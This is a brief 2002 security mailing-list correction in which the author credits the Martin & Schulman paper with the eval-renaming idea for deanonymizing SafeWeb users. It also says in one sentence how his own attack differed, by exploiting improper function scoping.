Correction: Re: Deanonymizing SafeWeb Users

From: peleus (peleusat_private)
Date: Wed Feb 13 2002 - 00:54:45 PST

    	I have to make a correction to my post regarding the paper.
    Re-naming of eval was listed in the Martin & Schulman paper in Section
    5.3.
    	Our renaming of function methods are similar but not the same.
    In both cases you are replacing function calls.  Martin & Schulmann
    reassign the pointers and definitions to the functions.  My attack deals
    with the fact that local scoping takes precedence and they didn't scope
    all of their functions properly.
    	My apologies to everyone for the error.

    -Peleus

    Peleus Uhley